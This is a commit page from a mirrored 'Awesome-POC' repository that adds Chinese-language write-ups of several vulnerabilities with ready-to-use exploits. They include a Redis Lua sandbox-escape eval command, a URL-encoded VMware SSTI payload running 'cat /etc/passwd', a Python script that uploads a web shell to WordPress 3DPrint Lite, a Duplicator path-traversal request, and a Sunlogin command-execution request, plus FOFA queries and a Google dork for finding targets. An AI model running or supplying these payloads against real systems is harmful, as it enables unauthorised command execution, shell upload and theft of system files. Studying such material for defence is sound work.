admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-05 10:50:23 +00:00
Code Issues Packages Projects Releases Wiki Activity

更新漏洞库:服务器应用漏洞/

Browse Source
This commit is contained in:
Threekiii 2022-05-24 13:56:53 +08:00
parent ad23dd912c
commit 4eed2213ef
7 changed files with 497 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
服务器应用漏洞/Redis Lua 沙箱绕过 远程命令执行 CVE-2022-0543.md Normal file
View File

@ -0,0 +1,23 @@
# Redis Lua 沙箱绕过 远程命令执行 CVE-2022-0543
## 漏洞描述
Redis是著名的开源Key-Value数据库其具备在沙箱中执行Lua脚本的能力。
Debian以及Ubuntu发行版的源在打包Redis时在Lua沙箱中遗留了一个对象package攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数进而逃逸沙箱执行任意命令。
## 漏洞影响
```
只限于Debian和Debian派生的Linux发行版如Ubuntu上的Redis服务
```
## 漏洞复现
远程连接Redis, 执行POC
```
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("whoami", "r"); local res = f:read("*a"); f:close(); return res' 0
```
![image-20220524131958982](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241320211.png)

33
服务器应用漏洞/VMware Workspace ONE Access SSTI漏洞 CVE-2022-22954.md Normal file
View File

@ -0,0 +1,33 @@
# VMware Workspace ONE Access SSTI漏洞 CVE-2022-22954
## 漏洞描述
VMware Workspace ONE Access以前称为VMware Identity Manager旨在通过多因素身份验证、条件访问和单点登录让您的员工更快地访问SaaS、Web和本机移动应用程序。其中的CVE-2022-22954是一个匿名服务器模板注入漏洞未经身份验证的攻击者可以利用此漏洞进行远程任意代码执行。
## 漏洞影响
```
VMware Workspace ONE Access Appliance 版本号20.10.0.0 20.10.0.1 21.08.0.0 21.08.0.1
VMware Identity Manager Appliance 版本号3.3.3 3.3.4 3.3.5 3.3.6
VMware Realize Automation 版本号7.6
```
## FOFA
```
app="vmware-Workspace-ONE-Access"
```
## 漏洞复现
登录页面
![image-20220524132528721](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241325815.png)
验证POC
```
/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d
```
![image-20220524132657968](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241326167.png)

8
服务器应用漏洞/Windows Chrome 远程命令执行漏洞.md
View File

@ -4,6 +4,14 @@
Windows Chrome 0day 在 2021-4-13 被公开 Windows Chrome 0day 在 2021-4-13 被公开
该漏洞未绕过沙箱,需要关闭沙箱才能成功弹出计算器
```
# 关闭沙箱
右键图标-->属性,然后在目标后面加上 -no-sandbox
点击确认
```
## 漏洞影响 ## 漏洞影响
``` ```

123
服务器应用漏洞/WordPress 3DPrint Lite 3dprint-lite-functions.php 任意文件上传漏洞.md Normal file
View File

@ -0,0 +1,123 @@
# WordPress 3DPrint Lite 3dprint-lite-functions.php 任意文件上传漏洞
## 漏洞描述
WordPress 3DPrint Lite Version 1.9.1.4 版本 中的 3dprint-lite-functions.php 文件存在文件上传漏洞,攻击者通过构造请求包可以上传任意文件获取服务器权限
## 漏洞影响
```
3DPrint Lite Version 1.9.1.4 版本
```
## 插件名
3DPrint Lite
https://downloads.wordpress.org/plugin/3dprint-lite.1.9.1.4.zip
## 漏洞复现
首先看一下插件注册的接口
![1638590530183-dbba3790-04d8-4567-bf1e-2f49629a9911](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241329738.png)
```
if ( is_admin() ) {
add_action( 'admin_enqueue_scripts', 'p3dlite_enqueue_scripts_backend' );
add_action( 'wp_ajax_p3dlite_handle_upload', 'p3dlite_handle_upload' );
add_action( 'wp_ajax_nopriv_p3dlite_handle_upload', 'p3dlite_handle_upload' );
include 'includes/3dprint-lite-admin.php';
}
else {
add_action( 'wp_enqueue_scripts', 'p3dlite_enqueue_scripts_frontend' );
include 'includes/3dprint-lite-frontend.php';
}
```
跟踪 p3dlite_handle_upload 方法 `wp-content/plugins/3dprint-lite/includes/3dprint-lite-functions.php`
![2](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241331648.png)
向下看可以看到一个标准的文件上传代码
![3](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241331787.png)
通过调试可以找到上传路径 `/wp-content/uploads/p3d/`
![image-20220524133048318](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241330351.png)
未授权调用 p3dlite_handle_upload 上传文件
```
# Exploit Title: Wordpress Plugin 3DPrint Lite 1.9.1.4 - Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/3dprint-lite/
# Date: 22/09/2021
# Exploit Author: spacehen
# Vendor Homepage: https://wordpress.org/plugins/3dprint-lite/
# Version: <= 1.9.1.4
# Tested on: Ubuntu 20.04.1
import os.path
from os import path
import json
import requests;
import sys
def print_banner():
print("3DPrint Lite <= 1.9.1.4 - Arbitrary File Upload")
print("Author -> spacehen (www.github.com/spacehen)")
def print_usage():
print("Usage: python3 exploit.py [target url] [php file]")
print("Ex: python3 exploit.py https://example.com ./shell.php")
def vuln_check(uri):
response = requests.get(uri)
raw = response.text
if ("jsonrpc" in raw):
return True;
else:
return False;
def main():
print_banner()
if(len(sys.argv) != 3):
print_usage();
sys.exit(1);
base = sys.argv[1]
file_path = sys.argv[2]
ajax_action = 'p3dlite_handle_upload'
admin = '/wp-admin/admin-ajax.php';
uri = base + admin + '?action=' + ajax_action ;
check = vuln_check(uri);
if(check == False):
print("(*) Target not vulnerable!");
sys.exit(1)
if( path.isfile(file_path) == False):
print("(*) Invalid file!")
sys.exit(1)
files = {'file' : open(file_path)}
print("Uploading Shell...");
response = requests.post(uri, files=files)
file_name = path.basename(file_path)
if(file_name in response.text):
print("Shell Uploaded!")
if(base[-1] != '/'):
base += '/'
print(base + "wp-content/uploads/p3d/" + file_name);
else:
print("Shell Upload Failed")
sys.exit(1)
main();
```
![4](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241331913.png)

76
服务器应用漏洞/WordPress Duplicator duplicator.php 任意文件读取漏洞 CVE-2020-11738.md Normal file
View File

@ -0,0 +1,76 @@
# WordPress Duplicator duplicator.php 任意文件读取漏洞 CVE-2020-11738
## 漏洞描述
WordPress Duplicator插件由于对文件下载没有进行验证则导致了任意文件读取漏洞
## 漏洞影响
```
Duplicator <= v1.3.26
```
## 插件名
Duplicator
https://downloads.wordpress.org/plugin/duplicator.1.3.26.zip
## 漏洞复现
首先先查看注册的无需授权的action接口 `wp-content/plugins/duplicator/ctrls/class.web.services.php`
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241332267.png)
这里 `wp_ajax_nopriv_duplicator_download` 对应的函数名为 duplicator_download
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241332007.png)
```
public static function duplicator_download() {
$file = sanitize_text_field($_GET['file']);
$filepath = DUPLICATOR_SSDIR_PATH.'/'.$file;
// Process download
if(file_exists($filepath)) {
// Clean output buffer
if (ob_get_level() !== 0 && @ob_end_clean() === FALSE) {
@ob_clean();
}
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($filepath).'"');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($filepath));
flush(); // Flush system output buffer
try {
$fp = @fopen($filepath, 'r');
if (false === $fp) {
throw new Exception('Fail to open the file '.$filepath);
}
while (!feof($fp) && ($data = fread($fp, DUPLICATOR_BUFFER_READ_WRITE_SIZE)) !== FALSE) {
echo $data;
}
@fclose($fp);
} catch (Exception $e) {
readfile($filepath);
}
exit;
} else {
wp_die('Invalid installer file name!!');
}
}
```
可以看到这里接受参数 file拼接至 $filepath 中,通过调试可以得知
DUPLICATOR_SSDIR_PATH 为 wp-snapshots 目录file可控且没有过滤导致任意文件读取
```
/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../etc/passwd
```
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241334750.png)

195
服务器应用漏洞/WordPress Redux Framework class-redux-helpers.php 敏感信息泄漏漏洞 CVE-2021-38314.md Normal file
View File

@ -0,0 +1,195 @@
# WordPress Redux Framework class-redux-helpers.php 敏感信息泄漏漏洞 CVE-2021-38314
## 漏洞描述
2021年8月爆出Redux Framework存在未授权的敏感信息泄露漏洞CVE编号为CVE-2021-38314影响v4.2.11及以下版本,发送特定的请求包可以在未授权的情况下获取服务器敏感信息
## 漏洞影响
```
Redux Framework <= v4.2.11
```
## 插件名
Redux Framework
https://github.com/reduxframework/redux-framework
## 漏洞复现
影响范围为 v4.211 以下, 看一下版本间的更新差异
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241336913.png)
这里将 add_action 注册的函数都删除掉了,本地安装查看函数相关代码
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241337021.png)
```
$support_hash = md5( md5( Redux_Functions_Ex::hash_key() . '-redux' ) . '-support' );
add_action( 'wp_ajax_nopriv_' . $support_hash, array( 'Redux_Helpers', 'support_args' ) );
add_action( 'wp_ajax_' . $support_hash, array( 'Redux_Helpers', 'support_args' ) );
$hash_arg = md5( trailingslashit( network_site_url() ) . '-redux' );
add_action( 'wp_ajax_nopriv_' . $hash_arg, array( 'Redux_Helpers', 'hash_arg' ) );
add_action( 'wp_ajax_' . $hash_arg, array( 'Redux_Helpers', 'hash_arg' ) );
add_action( 'wp_ajax_redux_support_hash', array( 'Redux_Functions', 'support_hash' ) );
add_filter( 'redux/tracking/options', array( 'Redux_Helpers', 'redux_stats_additions' ) );
```
查看 add_action 注册的函数 hash_arg() 和 support_args()
```
public static function hash_arg() {
echo esc_html( md5( Redux_Functions_Ex::hash_key() . '-redux' ) );
die();
}
public static function support_args() {
header( 'Expires: Mon, 26 Jul 1997 05:00:00 GMT' );
header( 'Last-Modified: ' . gmdate( 'D, d M Y H:i:s' ) . 'GMT' );
header( 'Expires: Sat, 26 Jul 1997 05:00:00 GMT' );
header( 'Cache-Control: no-store, no-cache, must-revalidate' );
header( 'Cache-Control: post-check=0, pre-check=0', false );
header( 'Pragma: no-cache' );
$instances = Redux::all_instances();
if ( isset( $_REQUEST['i'] ) && ! empty( $_REQUEST['i'] ) ) { // phpcs:ignore WordPress.Security.NonceVerification
if ( is_array( $instances ) && ! empty( $instances ) ) {
foreach ( $instances as $opt_name => $data ) {
if ( md5( $opt_name . '-debug' ) === $_REQUEST['i'] ) { // phpcs:ignore WordPress.Security.NonceVerification
$array = $data;
}
}
}
if ( isset( $array ) ) {
// We only want the extension names and versions.
$array->extensions = self::get_extensions( $opt_name );
$to_return = array();
// Filter out all the unwanted data.
foreach ( $array as $key => $value ) {
if ( in_array(
$key,
array(
// 'fields',
'extensions',
'sections',
'args',
// 'field_types'
),
true
) ) {
$to_return[ $key ] = $value;
} else { // phpcs:ignore Generic.CodeAnalysis.EmptyStatement
// phpcs:ignore Squiz.PHP.CommentedOutCode
/* echo $key.PHP_EOL; */
}
}
$array = $to_return;
} else {
die();
}
} else {
$array = self::get_statistics_object();
if ( is_array( $instances ) && ! empty( $instances ) ) {
$array['instances'] = array();
foreach ( $instances as $opt_name => $data ) {
$array['instances'][] = $opt_name;
}
}
$array['key'] = md5( Redux_Functions_Ex::hash_key() );
}
ksort( $array ); // Let's make that pretty.
// phpcs:ignored WordPress.PHP.NoSilencedErrors, WordPress.Security.EscapeOutput
echo @htmlspecialchars( @wp_json_encode( $array, true ), ENT_QUOTES );
die();
}
```
support_args() 函数 $_REQUEST['i'] 为空,来到另一处分支
```
} else {
$array = self::get_statistics_object();
if ( is_array( $instances ) && ! empty( $instances ) ) {
$array['instances'] = array();
foreach ( $instances as $opt_name => $data ) {
$array['instances'][] = $opt_name;
}
}
$array['key'] = md5( Redux_Functions_Ex::hash_key() );
}
```
跟踪 get_statistics_object() 函数,该函数可以获取插件等环境变量信息
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241337236.png)
可以看到该函数 为 `wp_ajax_nopriv_*` 可未授权调用
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241337688.png)
其中需要变量 $support_hash, 跟踪 hash_key() 方法
```
$support_hash = md5( md5( Redux_Functions_Ex::hash_key() . '-redux' ) . '-support' );
```
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241337002.png)
wp-config.php 中存在 AUTH_KEY 参数,为随机值
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241337166.png)
回到 hash_arg() 函数
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241338129.png)
```
public static function hash_arg() {
echo esc_html( md5( Redux_Functions_Ex::hash_key() . '-redux' ) );
die();
}
```
这里就调用到了 Redux_Functions_Ex::hash_key() 中的函数,且返回 md5值
回到刚刚的代码中,可以发现得到的结果同样也是 $support_hash 我们所需要知道的参数,下面为等价替换
```
$support_hash = md5(hash_arg(). '-support' );
```
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241338081.png)
这样我们就获取到了一个利用链
```
$hash_arg = md5( trailingslashit( network_site_url() ) . '-redux' );
add_action( 'wp_ajax_nopriv_' . $hash_arg, array( 'Redux_Helpers', 'hash_arg' ) );
|
获取 md5( Redux_Functions_Ex::hash_key() . '-redux') 值
|
$support_hash = md5( md5( Redux_Functions_Ex::hash_key() . '-redux' ) . '-support' );
add_action( 'wp_ajax_nopriv_' . $support_hash, array( 'Redux_Helpers', 'support_args' ) );
|
调用函数 support_args 获取系统敏感信息
```
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241338421.png)
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241338050.png)
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241338052.png)
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241338807.png)
成功获取到了插件版本等有关信息

39
服务器应用漏洞/向日葵 check 远程命令执行漏洞 CNVD-2022-10270.md Normal file
View File

@ -0,0 +1,39 @@
# 向日葵 check 远程命令执行漏洞 CNVD-2022-10270
## 漏洞描述
向日葵通过发送特定的请求获取CID后可调用 check接口实现远程命令执行导致服务器权限被获取
## 漏洞影响
```
11.0.0.33162
```
## FOFA
```
body="Verification failure"
```
## 漏洞复现
向日葵在开启后会默认在 40000-65535 之间开启某端口
![image-20220524135408561](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241354598.png)
发送请求获取CID
```
/cgi-bin/rpc?action=verify-haras
```
![image-20220524135428094](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241354132.png)
使用获取到的 verify_string 作为 cookie的 CID字段进行命令执行
```
/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+ipconfig
```
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241354108.png)